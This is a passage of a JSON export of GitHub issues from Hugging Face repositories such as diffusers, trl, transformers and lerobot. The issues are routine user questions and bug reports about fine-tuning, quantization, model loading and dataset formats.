    "body": "Could you please give an instruction/demo on how to use my own dataset (any column name) to apply sft?",
    "url": "https://github.com/huggingface/open-r1/issues/521",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-18T11:38:19Z",
    "updated_at": "2025-03-18T14:21:36Z",
    "user": "dongdongzhaoUP"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11103,
    "title": "Which repo should I use for LTX-Video 0.9.5 diffusers",
    "body": "I see the changes are merged\n\nChecked repo and it is empty\nhttps://huggingface.co/Lightricks/LTX-Video-0.9.5/tree/main\n\nNoticed in test pipeline it is \nrepo = \"YiYiXu/ltx-95\"\n\nSo can I safely assume that the above can be used?\n\n\n@yiyixuxu ",
    "url": "https://github.com/huggingface/diffusers/issues/11103",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-18T10:50:41Z",
    "updated_at": "2025-03-18T11:00:34Z",
    "comments": 2,
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/trl",
    "number": 3103,
    "title": "How are Lora parameters used in VLLM generation? (_move_model_to_vllm in GRPO trainer)",
    "body": "From the following code does not see the process of moving lora training parameters to VLLM? How guarantee that generated with the latest parameters? Can someone help explain.\n\"Image\"\n\nAnd I printed the vllm loaded model, and I didn't see LORA-related parameters either.\n\"Image\"\n\nMore, LORARequest was also not seen in the generation calls\n\"Image\"\n",
    "url": "https://github.com/huggingface/trl/issues/3103",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\u26a1 PEFT"
    ],
    "created_at": "2025-03-18T09:24:48Z",
    "updated_at": "2025-03-24T18:32:19Z",
    "user": "cuiyuhao1996"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7457,
    "title": "Document the HF_DATASETS_CACHE env variable",
    "body": "### Feature request\n\nHello,\n\nI have a use case where my team is sharing models and dataset in shared directory to avoid duplication.\nI noticed that the [cache documentation for datasets](https://huggingface.co/docs/datasets/main/en/cache) only mention the `HF_HOME` environment variable but never the `HF_DATASETS_CACHE`.\n\nIt should be nice to add `HF_DATASETS_CACHE` to datasets documentation if it's an intended feature.\nIf it's not, I think a depreciation warning would be appreciated.\n\n### Motivation\n\nThis variable is fully working and similar to what `HF_HUB_CACHE` does for models, so it's nice to know that this exists. This seems to be a quick change to implement.\n\n### Your contribution\n\nI could contribute since this is only affecting a small portion of the documentation",
    "url": "https://github.com/huggingface/datasets/issues/7457",
    "state": "closed",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-03-17T12:24:50Z",
    "updated_at": "2025-05-06T15:54:39Z",
    "comments": 4,
    "user": "LSerranoPEReN"
  },
  {
    "repo": "huggingface/transformers",
    "number": 36762,
    "title": "When what needs to be loaded is in the cache directory, there is no need to make a request to the remote",
    "body": "### Feature request\n\nWhen what needs to be loaded is in the cache directory, there is no need to make a request to the remote.\n\n\n\n### Motivation\n\nI noticed that when `AutoTokenizer` loads a file using `from_pretrained`, it first tries to load it from a cached directory when `pretrained_model_name_or_path` is a model_id (such as gpt2).\n\nHowever, `commit_hash` is `None` by default, e.g. `AutoTokenizer` will call `get_tokenizer_config` to load the configuration file, where the code to get `commit_hash` is: `commit_hash = kwargs.get(\"_commit_ hash\u201d, None)`. \n\nSince it is None, the `cached_file` method doesn't know where the corresponding file is actually stored, so it uses the `hf_hub_download` method to request the corresponding `commit_hash` first. \nAlthough this request is very simple and infrequent, **in offline environments (e.g., a company or school intranet that does not allow access to the extranet), it will report an error.**\n\nI know I can copy files from the cache to my project directory, but the host is usually used by multiple people, which means it may have to be copied many times, which defeats the purpose of using a cached directory in the first place.\n\n### Your contribution\n\n**I suggest changing `commit_hash = kwargs.get(\u201c_commit_hash\u201d, None)` to `commit_hash = kwargs.get(\u201c_commit_hash\u201d, \u201cmain\u201d)`**.",
    "url": "https://github.com/huggingface/transformers/issues/36762",
    "state": "closed",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-03-17T11:20:24Z",
    "updated_at": "2025-03-19T15:49:04Z",
    "user": "JinFish"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11086,
    "title": "RuntimeError after using apply_group_offloading on diffusers: Input type (torch.cuda.FloatTensor) and weight type (torch.FloatTensor) should be the same",
    "body": "Can anyone help me?\nI used WanX's diffusers and used apply_group_offloading according to url: https://huggingface.co/docs/diffusers/main/en/optimization/memory. \nThe code is as follows:\n```\nimage_encoder = CLIPVisionModel.from_pretrained(local_model_path, subfolder=\"image_encoder\", torch_dtype=torch.float32)\nvae = AutoencoderKLWan.from_pretrained(local_model_path, subfolder=\"vae\", torch_dtype=torch.float32)\nscheduler_b = UniPCMultistepScheduler(prediction_type=\"flow_prediction\", use_flow_sigmas=True, flow_shift=5.0)\npipe = WanImageToVideoPipeline.from_pretrained(local_model_path, vae=vae, image_encoder=image_encoder, scheduler=scheduler_b, torch_dtype=torch.bfloat16)\npipe.transformer.enable_group_offload(onload_device=torch.device(\"cuda\"), offload_device=torch.device(\"cpu\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\napply_group_offloading(pipe.text_encoder, onload_device=torch.device(\"cuda\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\napply_group_offloading(pipe.vae, onload_device=torch.device(\"cuda\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\napply_group_offloading(pipe.image_encoder, onload_device=torch.device(\"cuda\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\n```\n\nThen print the device information:\n`Before apply_offload:\ntext_encoder device: cpu\ntransformer device: cpu\nvae device: cpu\nimage_encoder device: cpu\nstart to group_offload_block_1_stream\nAfter apply_offload:\ntext_encoder device: cpu\ntransformer device: cpu\nvae device: cpu\nimage_encoder device: cpu`\n\nFinally, an exception is thrown:\n`    return F.conv3d(\n           ^^^^^^^^^\nRuntimeError: Input type (torch.cuda.FloatTensor) and weight type (torch.FloatTensor) should be the same`\n\nDoes anyone know how to fix this? Thanks a lot.",
    "url": "https://github.com/huggingface/diffusers/issues/11086",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-17T11:03:48Z",
    "updated_at": "2025-04-16T15:03:36Z",
    "comments": 5,
    "user": "tiga-dudu"
  },
  {
    "repo": "huggingface/trl",
    "number": 3093,
    "title": "How to use a custom function as the reward model for PPO training",
    "body": "The new version of TRL's PPOtrainer requires Module as the reward model, but I need a custom function calculation to calculate the reward. I tried to lower the TRL version to 0.11.4, but the old version does not seem to support the peft model. I get the following error:\nValueError: model must be a PreTrainedModelWrapper, got  - supported architectures are: (, )\nHowever, I see the is_peft_model parameter in PPOConfig, but there is no such parameter as peft_config in PPOTrainer\nSo I am very troubled now. Is there a good brother who can help me?\n",
    "url": "https://github.com/huggingface/trl/issues/3093",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb PPO",
      "\u26a1 PEFT"
    ],
    "created_at": "2025-03-16T09:02:25Z",
    "updated_at": "2025-03-20T10:33:02Z",
    "user": "JWQZ"
  },
  {
    "repo": "huggingface/ai-deadlines",
    "number": 19,
    "title": "How to know the rankings of a conference?",
    "body": "@NielsRogge, may I know where we can get the conference rankings?",
    "url": "https://github.com/huggingface/ai-deadlines/issues/19",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-15T18:32:34Z",
    "updated_at": "2025-03-15T21:45:02Z",
    "user": "julurisaichandu"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11063,
    "title": "prepare_attention_mask - incorrect padding?",
    "body": "### Describe the bug\n\nI'm experimenting with attention masking in Stable Diffusion (so that padding tokens aren't considered for cross attention), and I found that UNet2DConditionModel doesn't work when given an `attention_mask`.\n\nhttps://github.com/huggingface/diffusers/blob/8ead643bb786fe6bc80c9a4bd1730372d410a9df/src/diffusers/models/attention_processor.py#L740\n\nFor the attn1 blocks (self-attention), the target sequence length is different from the current length (target 4096, but it's only 77 for a typical CLIP output). The padding routine pads by *adding* `target_length` zeros to the end of the last dimension, which results in a sequence length of 4096 + 77, rather than the desired 4096. I think it should be:\n\n```diff\n- attention_mask = F.pad(attention_mask, (0, target_length), value=0.0)\n+ attention_mask = F.pad(attention_mask, (0, target_length - current_length), value=0.0)\n```\n\n`encoder_attention_mask` works fine  - it's passed to the attn2 block and no padding ends up being necessary.\n\nIt seems that this would additionally fail if current_length were greater than target_length, since you can't pad by a negative amount, but I don't know that that's a practical concern.\n\n(I know that particular masking isn't even semantically valid, but that's orthogonal to this issue!)\n\n### Reproduction\n\n```python\n# given a Stable Diffusion pipeline\n# given te_mask = tokenizer_output.attention_mask\npipeline.unet(latent_input, timestep, text_encoder_output, attention_mask=te_mask).sample\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.0.dev0\n- Platform: Linux-6.8.0-55-generic-x86_64-with-glibc2.39\n- Running on Google Colab?: No\n- Python version: 3.10.11\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.28.1\n- Transformers version: 4.48.3\n- Accelerate version: 1.3.0\n- PEFT version: not installed\n- Bitsandbytes version: 0.45.2\n- Safetensors version: 0.5.2\n- xFormers version: 0.0.29.post2\n- Accelerator: NVIDIA GeForce RTX 3060, 12288 MiB\nNVIDIA GeForce RTX 4060 Ti, 16380 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11063",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-14T19:01:01Z",
    "updated_at": "2025-04-14T15:03:14Z",
    "comments": 2,
    "user": "cheald"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1237,
    "title": "Using pipeline API in Mobile Devices",
    "body": "### Question\n\nHow can I do the pipeline running in mobile devices?\n\nLike here:\npipeline('background-removal', 'briaai/RMBG-1.4', { device: \"webgpu\" })\n\nOr it depends from the model avaliable?\n\nI don't find documentations about pipeline API options, like 'device' and others params...",
    "url": "https://github.com/huggingface/transformers.js/issues/1237",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-14T17:55:27Z",
    "updated_at": "2025-05-11T19:58:39Z",
    "user": "LuSrodri"
  },
  {
    "repo": "huggingface/autotrain-advanced",
    "number": 869,
    "title": "How to fine-tune a custom model for Ollama?",
    "body": "Probably a stupid question, but I'm trying to upload a .csv dataset and fine-tune an 8B model in Autotrain. But when I add the model name taken from Ollama (e.g. deepseek-r1:8b or DeepSeek-R1-Distill-Llama-8B-NexaQuant) and try to train, I get an error. \n\n  validated_self = self.__pydantic_validator__.validate_python(data, self_instance=self)\npydantic_core._pydantic_core.ValidationError: 1 validation error for LLMTrainingParams\ntoken\n  Input should be a valid string [type=string_type, input_value=, input_type=_TemplateResponse]\n    For further information visit https://errors.pydantic.dev/2.10/v/string_type\n\nI'm too stupid to know what's wrong or how to correct it, so any help gratefully received. I can fine-tune with existing models in the drop-down list OK, so the setup seems to be working.",
    "url": "https://github.com/huggingface/autotrain-advanced/issues/869",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-14T14:46:23Z",
    "updated_at": "2025-05-03T15:01:33Z",
    "user": "nigelp"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11060,
    "title": "`prepare_image` in Kandinsky pipelines doesn't support `torch.Tensor`",
    "body": "Hi, I want to report a bug in Kandinsky pipelines.\n\nhttps://github.com/huggingface/diffusers/blob/2f0f281b0d808c05bc7a974e68d298a006dd120a/src/diffusers/pipelines/kandinsky/pipeline_kandinsky_img2img.py#L413-L420\n\nAccording to the above contents, elements in `image` can be either `PIL.Image.Image` or `torch.Tensor`.\n\nhttps://github.com/huggingface/diffusers/blob/2f0f281b0d808c05bc7a974e68d298a006dd120a/src/diffusers/pipelines/kandinsky/pipeline_kandinsky_img2img.py#L98-L104\n\nHowever, the `prepare_image` function is only for `PIL.Image.Image`, and does not support `torch.Tensor`.\n\nCan you resolve this problem by implementing an image resize function for `torch.Tensor`?",
    "url": "https://github.com/huggingface/diffusers/issues/11060",
    "state": "closed",
    "labels": [
      "good first issue",
      "help wanted"
    ],
    "created_at": "2025-03-14T10:34:30Z",
    "updated_at": "2025-04-21T18:41:10Z",
    "comments": 1,
    "user": "dk-hong"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 39,
    "title": "How to choose ExprExtractionConfig() and LatexExtractionConfig()",
    "body": "Hi. Thanks for your awesome tool. \n\nI want to ask how I should set the configuration when the answer is either LaTeX or Expr? I found that if the case below (without $$ $$) is not set, the output will be false when the expected result is true.\n\n```python\nfrom math_verify import parse, verify\n\ngold = parse(\"\\\\frac{\\sqrt{3}}{3}\")\nanswer = parse(\"sqrt(3)/3\")\n\n# Order here is important!\nverify(gold, answer)\n```",
    "url": "https://github.com/huggingface/Math-Verify/issues/39",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-13T23:36:27Z",
    "updated_at": "2025-04-28T20:42:03Z",
    "user": "Zhuofeng-Li"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11055,
    "title": "Training on unconditional image generation creates colorized images",
    "body": "### Describe the bug\n\nHi, I'm trying to follow the tutorial from unconditional image generation on my own dataset, and I'm getting weirdly colored images. I originally thought it was due to RGB/BGR channel order, but I've switched it around and got the same result. Do you have any suggestions of how to fix it? \n\n### Reproduction\n\nNA\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNA\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11055",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-13T20:47:22Z",
    "updated_at": "2025-04-13T15:02:53Z",
    "comments": 1,
    "user": "esizikova-fda"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 860,
    "title": "Modify camera async_read/read API to return a dictionary instead of tuple for better compatability?",
    "body": "Currently the intel real sense camera api supports returning either a single rgb image or a rgb image and depth image as a 2-uple\n\nhttps://github.com/huggingface/lerobot/blob/3c0a209f9fac4d2a57617e686a7f2a2309144ba2/lerobot/common/robot_devices/cameras/intelrealsense.py#L440-L443\n\nHowever this is not super compatible to work with since not all cameras might return two values (open cv one only does rgb?). For a potentially better API would it be possible to have the async read / read functions always return a dictionary instead with some standard names and data types for the types of image data returned?\n\ne.g.\n\n```\nreturn dict(rgb=..., depth=...)\n```\n\nThis way it is also easier for me to check if the returned data has depth data or not. The current solution is a bit complicated as I need to check if its the IntelRealSenseCamera and if its config has use_depth=True or not.\n\nThanks!",
    "url": "https://github.com/huggingface/lerobot/issues/860",
    "state": "closed",
    "labels": [
      "enhancement",
      "question"
    ],
    "created_at": "2025-03-13T18:44:20Z",
    "updated_at": "2025-05-26T09:28:48Z",
    "user": "StoneT2000"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1230,
    "title": "Using background-removal pipeline produces images with 50% opacity",
    "body": "### Question\n\nI have a issue using the background-removal pipeline. Some models returns the exacly same image, but 50% opacite (RGBA: [X, Y, Z, 127]). So other models, returns an error like this: Uncaught Error: Unsupported model type: null transformers:1:670067.\n\nHow can I procede?",
    "url": "https://github.com/huggingface/transformers.js/issues/1230",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-13T17:00:13Z",
    "updated_at": "2025-03-25T22:28:37Z",
    "user": "LuSrodri"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 858,
    "title": "DATASET conversion from V.16 to V2.0 \u274c\u274c\u274c",
    "body": "\nHi @aliberts @Cadene\nThanks for your amazing work. I have one doubt, I forked lerobot repo and training some policies, now i want to convert to V1.6 to V2.0, but my episodes are .pth format not in parquet format. I check remaining issues, i didn't find anything. right now while conversion it takes only parquet format.\nimage\nCan you please help me here\nThanks\n\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\ntried covert_v1_to_v2.py\nBut its expecting only parquet but mine is pth\n\n### Expected behavior\n\n![Image](https://github.com/user-attachments/assets/f682d94d-e540-49c4-ba44-e059c9c073f2)",
    "url": "https://github.com/huggingface/lerobot/issues/858",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-13T15:22:51Z",
    "updated_at": "2025-10-07T02:26:46Z",
    "user": "Kacchan16"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2215,
    "title": "not able to convert DeepSeek-R1 into Onnx using optimum-cli",
    "body": "### System Info\n\n```shell\nv1.24.0\n```\n\n### Who can help?\n\n@michaelbenayoun \n\nI'm trying to convert DeepSeek-R1 into a onnx format, but i'm being presented with \n\n> ValueError: Loading deepseek-ai/DeepSeek-R1 requires you to execute the configuration file in that repo on your local machine. Make sure you have read the code there to avoid malicious use, then set the option `trust_remote_code=True` to remove this error.\n\nI'm trying to do this using optimum-cli\n\n`optimum-cli export onnx --model deepseek-ai/DeepSeek-R1 --task causal-lm C:\\DeepSeek-R1-Onnx`\n\nCan i somehow enable this using cli, or do i have to manually download the model into my system and using cli i would have to perform onnx instead of repo link\n\nif yes, then how can i enable trust_remote_code=True once i download the repo?\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\noptimum-cli export onnx --model deepseek-ai/DeepSeek-R1 --task causal-lm C:\\DeepSeek-R1-Onnx\n\nRunning this command doesn't provide an output\n\n### Expected behavior\n\nThe conversion should start for DeepSeek-R1 to ONNX",
    "url": "https://github.com/huggingface/optimum/issues/2215",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-13T07:07:10Z",
    "updated_at": "2025-05-13T11:13:36Z",
    "comments": 1,
    "user": "volcano619"
  },
  {
    "repo": "huggingface/trl",
    "number": 3066,
    "title": "How to switch on the multi-GPU for GRPOTrainer?",
    "body": "Issue: \nOOM errors during GRPO training - Need multi-GPU support for combined VRAM\n\nProblem Description:\nI'm encountering Out-of-Memory (OOM) errors while using GRPOTrainer to train reasoning capabilities similar to DeepSeek R1.\n\nMy Question:\nHow to switch on multi-GPU support for GRPOTrainer to utilize the combined VRAM across multiple GPUs (e.g., 40GB \u00d7 8 cards = 320GB total VRAM)?\n\nThank you!",
    "url": "https://github.com/huggingface/trl/issues/3066",
    "state": "closed",
    "labels": [
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-03-13T05:01:12Z",
    "updated_at": "2025-04-05T17:04:50Z",
    "user": "tjoymeed"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 314,
    "title": "[QUESTION] agent.run(stream=True)   How get finall result",
    "body": "agent = CodeAgent(\n    tools=[],\n    model=model,\n    max_steps=10,\n    verbosity_level=2\n)\n\nresponse = agent.run(\n    \"\"\"\n    descripe image\n    \"\"\",\n    images=image_urls,\n    stream=True\n)\n\nprint()???",
    "url": "https://github.com/huggingface/agents-course/issues/314",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-13T02:32:47Z",
    "updated_at": "2025-03-13T02:32:47Z",
    "user": "via007"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11046,
    "title": "flux pipeline inference with controlnet, inpainting, plus ip-adapter",
    "body": "### Describe the bug\n\nHi, I would like to utilize flux pipeline. But for now, I have gpu issues to use origin flux pipeline.\nIf I would like to use nf4 version, How can I set up the inference file on controlnet, inpainting, ip-adapter? \nDo I use Fluxcontrol depth or canny and mask, ip-adapter model? or fluxcontrol, fluxfill, ip-adapter?\n\nThanks,\n\n@hlky, @sayakpaul \n\n### Reproduction\n\nimport torch\nfrom diffusers import FluxControlInpaintPipeline\nfrom diffusers.models.transformers import FluxTransformer2DModel\nfrom transformers import T5EncoderModel\nfrom diffusers.utils import load_image, make_image_grid\nfrom image_gen_aux import DepthPreprocessor # https://github.com/huggingface/image_gen_aux\nfrom PIL import Image\nimport numpy as np\n\n\naccess_token = \"\"\npipe = FluxControlInpaintPipeline.from_pretrained(\n    \"black-forest-labs/FLUX.1-Depth-dev\",\n    torch_dtype=torch.bfloat16, token=access_token)\n\n# use following lines if you have GPU constraints\n# ---------------------------------------------------------------\ntransformer = FluxTransformer2DModel.from_pretrained(\n    \"sayakpaul/FLUX.1-Depth-dev-nf4\", subfolder=\"transformer\", torch_dtype=torch.bfloat16\n)\ntext_encoder_2 = T5EncoderModel.from_pretrained(\n    \"sayakpaul/FLUX.1-Depth-dev-nf4\", subfolder=\"text_encoder_2\", torch_dtype=torch.bfloat16\n)\npipe.transformer = transformer\npipe.text_encoder_2 = text_encoder_2\n\n\npipe.enable_model_cpu_offload()\n\n# ---------------------------------------------------------------\npipe.to(\"cuda\")\n\nprompt = \"a blue robot sad expressions\"\nimage = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/robot.png\")\n\nhead_mask = np.zeros_like(image)\nhead_mask[65:580,300:642] = 255\nmask_image = Image.fromarray(head_mask)\n\nprocessor = DepthPreprocessor.from_pretrained(\"LiheYoung/depth-anything-large-hf\")\ncontrol_image = processor(image)[0].convert(\"RGB\")\n\noutput = pipe(\n    prompt=prompt,\n    image=image,\n    control_image=control_image,\n    mask_image=mask_image,\n    num_inference_steps=30,\n    strength=1,\n    guidance_scale=10.0,\n    generator=torch.Generator().manual_seed(42),\n).images[0]\nmake_image_grid([image, control_image, mask_image, output.resize(image.size)], rows=1, cols=4).save(\"output.png\")\n\nchanging depth to canny, and add ip-adapter? \n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n.\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11046",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-12T20:14:01Z",
    "updated_at": "2025-04-12T15:02:52Z",
    "comments": 1,
    "user": "john09282922"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 854,
    "title": "How to train diffusion policy in only state space, no images?",
    "body": "I have been having a lot of trouble trying to only train a model on purely a state space task so there are no images involved. I have already looked through every tutorial and most source code files and just can not get this working.\n\nI have a script that creates a LeRobotDataset through human demonstrations. The script is simplified and only contains the relevant information. I simply record 10 demonstrations to create a LeRobotDataset from. There are no images the only observations is a (31, ) numpy float array. \n\n```\nfeature_dict = {\n    \"next.reward\": {\n        \"dtype\": \"float\",\n        \"shape\": (1,),\n        \"names\": None,\n    },\n    \"action\": {\n        \"dtype\": \"float64\",\n        \"shape\": (5, 1),\n        \"names\": None\n    },\n    \"next.success\": {\n        \"dtype\": \"bool\",\n        \"shape\": (1,),\n        \"names\": None,\n    },\n    # \"timestamp\": {\n    #     \"dtype\": \"float32\",\n    #     \"shape\": (1, ),\n    #     \"names\": None,\n    # },\n    \"observation.environment_state\": {\n        \"dtype\": \"float64\",\n        \"shape\": (31, ),\n        \"names\": None\n    },\n    \n}\n\ndataset_le_name = \"second_save\"\ndataset_dir = os.path.join(os.path.dirname(__file__), \"./files/\", dataset_le_name)\n\nle_dataset = LeRobotDataset.create(\n    repo_id=dataset_le_name,\n    fps=500,\n    root=dataset_dir,\n    features=feature_dict\n)\nenv.reset()\n\nfor _ in range(10):\n    while True:\n        step_start = time.time()\n        obs, reward, terminated, _, _ = env.step(None)\n\n        action = teleoperate_command()\n        \n        frame = {\n            \"action\": torch.from_numpy(action),\n            \"next.reward\": np.array([reward]),\n            \"next.success\": np.array([not terminated]),\n            #\"timestamp\": np.array([env.unwrapped.sim_object.data.time], dtype=np.float32).reshape(1,),\n            \"observation.environment_state\": obs,\n            \"task\": \"flick switch\"\n        }\n        le_dataset.add_frame(frame)\n\n        if terminated:\n            print(\"Task completed\")\n            break\n\n  le_dataset.save_episode()\n```\n\n\nThis script works fine and is able to create the dataset with no errors. But then when I try to train a diffusion policy from scratch, the exact example script from https://github.com/huggingface/lerobot/blob/main/examples/3_train_policy.py\n\n\n```# Create a directory to store the training checkpoint.\n    output_directory = Path(\"outputs/train/example_pusht_diffusion\")\n    output_directory.mkdir(parents=True, exist_ok=True)\n\n    # # Select your device\n    device = torch.device(\"cuda\")\n\n    # Number of offline training steps (we'll only do offline training for this example.)\n    # Adjust as you prefer. 5000 steps are needed to get something worth evaluating.\n    training_steps = 5000\n    log_freq = 1\n\n    # When starting from scratch (i.e. not from a pretrained policy), we need to specify 2 things before\n    # creating the policy:\n    #   - input/output shapes: to properly size the policy\n    #   - dataset stats: for normalization and denormalization of input/outputs\n    dataset_le_name = \"second_save\"\n    dataset_dir = os.path.join(os.path.dirname(__file__), \"./files/imitationDataset\", dataset_le_name)\n\n    dataset_metadata = LeRobotDatasetMetadata(dataset_le_name, root=dataset_dir)\n    features = dataset_to_policy_features(dataset_metadata.features)\n    output_features = {key: ft for key, ft in features.items() if ft.type is FeatureType.ACTION}\n    input_features = {key: ft for key, ft in features.items() if key not in output_features}\n\n    print(input_features)\n    # Policies are initialized with a configuration class, in this case `DiffusionConfig`. For this example,\n    # we'll just use the defaults and so no arguments other than input/output features need to be passed.\n    cfg = DiffusionConfig(input_features=input_features, output_features=output_features)\n\n\n    # We can now instantiate our policy with this config and the dataset stats.\n    policy = DiffusionPolicy(cfg, dataset_stats=dataset_metadata.stats)\n```\n\nI keep getting the error\n\n```Traceback (most recent call last):\n  File \"path/trainDiffusion.py\", line 105, in \n    main()\n  File \"path/trainDiffusion.py\", line 44, in main\n    policy = DiffusionPolicy(cfg, dataset_stats=dataset_metadata.stats)\n  File \"path/lerobot/lerobot/common/policies/diffusion/modeling_diffusion.py\", line 70, in __init__\n    config.validate_features()\n  File \"pathlerobot/lerobot/common/policies/diffusion/configuration_diffusion.py\", line 220, in validate_features\n    first_image_key, first_image_ft = next(iter(self.image_features.items()))\nStopIteration\n```\n\nLooking at the source code it seems its always checking for image features in the validate feature function, but I just want to train a diffusion policy with no images. How do I do this? ",
    "url": "https://github.com/huggingface/lerobot/issues/854",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-03-12T16:01:19Z",
    "updated_at": "2025-10-26T02:30:57Z",
    "user": "Nicholas-Baldassini"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11045,
    "title": "Crash when loading Flux Schnell 1 model with train_dreambooth_lora_flux",
    "body": "### Describe the bug\n\nWhen using the `Diffusers/example/dreambooth/train_dreambooth_lora_flux` script with the Flux Schnell 1 model, the process consistently crashes during the transformer shard loading at 33% (1/3), causing my entire Google JupyterLab kernel to crash.\n\n**Question:** Is this related to using the Flux Schnell model instead of a Dev model? Is there a known incompatibility?\n\n**Logs:**  03/12/2025 14:14:26 - INFO - __main__ - Distributed environment: NO\nNum processes: 1\nProcess index: 0\nLocal process index: 0\nDevice: cuda\n\nMixed precision type: bf16\n\nYou set `add_prefix_space`. The tokenizer needs to be converted from the slow tokenizers\nYou are using a model of type clip_text_model to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\nYou are using a model of type t5 to instantiate a model of type . This is not supported for all configurations of models and can yield errors.\n{'use_karras_sigmas', 'shift_terminal', 'use_beta_sigmas', 'time_shift_type', 'invert_sigmas', 'use_exponential_sigmas'} was not found in config. Values will be initialized to default values.\n\nLoading checkpoint shards:   0%|                        | 0/2 [00:00\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11045",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-12T15:08:11Z",
    "updated_at": "2025-05-07T15:18:15Z",
    "comments": 4,
    "user": "rleygonie"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11043,
    "title": "When will we be getting Quanto support for Wan 2.1?",
    "body": "The diffusers library for quantizers currently doesn't contain an entry for Quantro:\n\nhttps://github.com/huggingface/diffusers/tree/main/src/diffusers/quantizers\n\nIsn't this needed to perform requantization on a quantized Transformer for WAN 2.1?\n\nCurrently we can't do this due to missing Quanto quantizer after we've quantized and stored a Transformer:\n\n`                print('Quantize transformer')\n                class QuantizedWanTransformer3DModel(QuantizedDiffusersModel):\n                    base_class = WanTransformer3DModel\n                transformer = QuantizedWanTransformer3DModel.from_pretrained(\n                    \"./wan quantro T2V 14B Diffusers/basemodel/wantransformer3dmodel_qint8\"\n                  ).to(dtype=dtype)`",
    "url": "https://github.com/huggingface/diffusers/issues/11043",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-12T12:43:59Z",
    "updated_at": "2025-03-23T18:17:53Z",
    "comments": 2,
    "user": "ukaprch"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 853,
    "title": "How to customize adding other robot and manipulator\uff1f",
    "body": "Thanks for your great work! Now I got a problem how to customize adding other robot and manipulator. \n\nI have 7DOF bimanual manipulators robot, which is powered by servo-motor. I want to add it to lerobot so I can use this fantastic platform to collect data and train. Specially the ACT and diffusion policy.\n\nI have the URDF file, and already setup in ROS moveit and Isaac Sim, using 485 to drive the real robot.\n\nI checked the code and maybe I should crate new yaml file in /configs/robot an some other files for my robot.\n\nWhich is simpler compared to directly collecting data and training with ACT repository? Is there any tutorial on how to add a custom robot for fresh man?\n\nThanks a lot !\n\n![Image](https://github.com/user-attachments/assets/16ad1b01-eb31-40bf-b894-6d7c16a70c99)",
    "url": "https://github.com/huggingface/lerobot/issues/853",
    "state": "closed",
    "labels": [
      "question",
      "robots"
    ],
    "created_at": "2025-03-12T11:39:19Z",
    "updated_at": "2025-10-08T20:16:23Z",
    "user": "meijie-jesse"
  },
  {
    "repo": "huggingface/smollm",
    "number": 65,
    "title": "How to set video size when fine tuning",
